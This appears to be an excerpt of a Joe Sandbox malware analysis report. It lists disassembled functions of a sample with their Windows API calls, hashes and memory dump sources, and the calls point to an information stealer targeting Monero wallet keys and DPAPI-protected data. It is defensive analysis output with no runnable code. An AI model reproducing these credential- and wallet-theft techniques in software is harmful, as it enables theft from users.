                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !6l$GBc$P1z$PH_$Pswz$Zx,$Um{
                  • API String ID: 0-2757611981
                  • Opcode ID: 3b246794d03f94bdc659a3e06828b68eb3e4474e2a9a1e3f521e19597a748723
                  • Instruction ID: 6983b8af724114955b8f1918efdf4a2a17cd6d7e27c5e9d5ac2b2f62d8633040
                  • Opcode Fuzzy Hash: 3b246794d03f94bdc659a3e06828b68eb3e4474e2a9a1e3f521e19597a748723
                  • Instruction Fuzzy Hash: 22B2F8F3608200AFE7046E29EC8567ABBE9EF94720F16893DEAC4C3744E63558458797
                  Function 00B0E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00B20D73), ref: 00B0E4A2
                  • StrCmpCA.SHLWAPI(?,00B214F8), ref: 00B0E4F2
                  • StrCmpCA.SHLWAPI(?,00B214FC), ref: 00B0E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: e23c67cf585d6362ba81780110b35ca672c3c83f9fc829cd87454c8fa1737693
                  • Instruction ID: a33893f55d51e2cdafa55b03aa8eb3cc8ea17a75aacfe3c5666923e61291e28b
                  • Opcode Fuzzy Hash: e23c67cf585d6362ba81780110b35ca672c3c83f9fc829cd87454c8fa1737693
                  • Instruction Fuzzy Hash: 26125F319111189BDB14FB60DD96EED73B8AF54310F8045E9B50AA61D1EE307FCACBA2
                  Function 00ED50D9 Relevance: 9.0, Strings: 6, Instructions: 1531COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: &,s$-%~|$2,^$Bu}$Z{$['
                  • API String ID: 0-832473510
                  • Opcode ID: a46fa56749924d16d8defb93aebf20b86784cb7697f3e1bbbd219c4dc428654b
                  • Instruction ID: 8cbfcb7bc0b8be749c55084ba80cde03ad5cec5c8ad4584757f4a54456614794
                  • Opcode Fuzzy Hash: a46fa56749924d16d8defb93aebf20b86784cb7697f3e1bbbd219c4dc428654b
                  • Instruction Fuzzy Hash: 28A218F3A0C2109FE704AE2DEC8567AFBE9EF94220F16493DEAC5C7744E93558058792
                  Function 00ED9E65 Relevance: 7.9, Strings: 5, Instructions: 1604COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: P-^L$SJUw$i_R{$r)}$x7m?
                  • API String ID: 0-1857407287
                  • Opcode ID: dde06f25dcc9289eea30de3a5203d768b1c8c914dd6fcec76dff8dd696d033fa
                  • Instruction ID: 40c9f9be2d71fab752afb959a7e91aaaf7860fe2ee57d27f6e0c6486cc5877f8
                  • Opcode Fuzzy Hash: dde06f25dcc9289eea30de3a5203d768b1c8c914dd6fcec76dff8dd696d033fa
                  • Instruction Fuzzy Hash: 04B208F3A086009FE3046E2DEC8567ABBE5EF94720F1A493DEAC4C7744E63598058797
                  Function 00B0C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B0C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B0C87C
                  • lstrcat.KERNEL32(?,00B20B46), ref: 00B0C943
                  • lstrcat.KERNEL32(?,00B20B47), ref: 00B0C957
                  • lstrcat.KERNEL32(?,00B20B4E), ref: 00B0C978
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 2449315b367d9fbfffb292e231c8d4cf375c0e12a9ac3cc4d4cbed7ccca796cf
                  • Instruction ID: e77482c67be05a83ce355bffeeb443e8f81c009241002d9199cb9684ec3b84ea
                  • Opcode Fuzzy Hash: 2449315b367d9fbfffb292e231c8d4cf375c0e12a9ac3cc4d4cbed7ccca796cf
                  • Instruction Fuzzy Hash: EA415F7994431ADBDB10DFA4DD89BEEBBB8BB44304F1042A8E509A62C0D7745A84CFA1
                  Function 00B07240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B0724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B07254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B07281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00B072A4
                  • LocalFree.KERNEL32(?), ref: 00B072AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 0a944a183cbc32e2a55da792e2b12f94be8ba28b9f1713c1e2dd2bcde13caea7
                  • Instruction ID: 7a7cd34dbff373d3c5a5d569ef8a04e4b906c1c014fa64d967f2b27f0a7ec64a
                  • Opcode Fuzzy Hash: 0a944a183cbc32e2a55da792e2b12f94be8ba28b9f1713c1e2dd2bcde13caea7
                  • Instruction Fuzzy Hash: F70100B5A80308BBEB10DFD8DD49F9D77B8EB44704F104155FB05EA2C0DA70AA008B65
                  Function 00B19600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B1961E
                  • Process32First.KERNEL32(00B20ACA,00000128), ref: 00B19632
                  • Process32Next.KERNEL32(00B20ACA,00000128), ref: 00B19647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00B1965C
                  • CloseHandle.KERNEL32(00B20ACA), ref: 00B1967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 3f09f992780dec1101f8aae60129108499ca86cd60ae4bb4d7c823b90473d56d
                  • Instruction ID: 3bc8cb625a8886e5fd1aacca242d5ca8b69a88bdd2cd6d9d0bb0c8bb63c13b74
                  • Opcode Fuzzy Hash: 3f09f992780dec1101f8aae60129108499ca86cd60ae4bb4d7c823b90473d56d
                  • Instruction Fuzzy Hash: 1B010079A40308ABCB14DFA5CD54BDDB7F8EB48700F5041C8A505D6250D7349B80CF61
                  Function 00B18680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00B205B7), ref: 00B186CA
                  • Process32First.KERNEL32(?,00000128), ref: 00B186DE
                  • Process32Next.KERNEL32(?,00000128), ref: 00B186F3
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • CloseHandle.KERNEL32(?), ref: 00B18761
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: db30ef37bdc7c1320564d8ca958031368c9764910ce1f7052d69a3da71b6a14e
                  • Instruction ID: 61ae4e30c6208c45b3cdba0c969b7493ea4dc8a42823c6afecd37193f26aea1b
                  • Opcode Fuzzy Hash: db30ef37bdc7c1320564d8ca958031368c9764910ce1f7052d69a3da71b6a14e
                  • Instruction Fuzzy Hash: 90314D71902218ABCB24EF54DC45FEEB7B8FF45710F5041D9E10AA21A0DB306E85CFA1
                  Function 00B18EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00B05184,40000001,00000000,00000000,?,00B05184), ref: 00B18EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 94cb1b8e85dbbd20af7ee81d66ba2efaaf3db00af05d0cd4c310694e5476bea0
                  • Instruction ID: d18e72fdf26fec89986f621abe07737336e2f03e91f50bf558aa4bb349b0c807
                  • Opcode Fuzzy Hash: 94cb1b8e85dbbd20af7ee81d66ba2efaaf3db00af05d0cd4c310694e5476bea0
                  • Instruction Fuzzy Hash: 4C11DA75200205AFDB00CFA4D885FA637EAFF89714F509998F9198B250DB75E981DB60
                  Function 00B09AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B04EEE,00000000,00000000), ref: 00B09AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00B04EEE,00000000,?), ref: 00B09B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B04EEE,00000000,00000000), ref: 00B09B2A
                  • LocalFree.KERNEL32(?,?,?,?,00B04EEE,00000000,?), ref: 00B09B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: e6338474e0b58b9fb353fcee6214d63c1fdc89ad226cac718e3dc8a669c981e9
                  • Instruction ID: 1fa4dc2b2d4da520b63b41d6f5626cedc43e030bc668e7c531d14048eae136c4
                  • Opcode Fuzzy Hash: e6338474e0b58b9fb353fcee6214d63c1fdc89ad226cac718e3dc8a669c981e9
                  • Instruction Fuzzy Hash: 091174B8641308AFEB10CF64DC95FAA77B5FB89714F208158F9159B3D0C776A941CB60
                  Function 00B17980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B20E00,00000000,?), ref: 00B179B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B179B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00B20E00,00000000,?), ref: 00B179C4
                  • wsprintfA.USER32 ref: 00B179F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 5a8cb318dd32a879aa85632b537e8c8dc137f5a04ed9536b4307bff3bc9d21d9
                  • Instruction ID: bea12e5032506fa11ed074a6feeb04ad646b68d89dd0936693b8abde5e622608
                  • Opcode Fuzzy Hash: 5a8cb318dd32a879aa85632b537e8c8dc137f5a04ed9536b4307bff3bc9d21d9
                  • Instruction Fuzzy Hash: 4C1127B2944218ABCB14DFC9DD45BBEB7F8FB4DB11F10425AF605A2280E6395940CBB1
                  Function 00B17A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                  Download Yara Rule
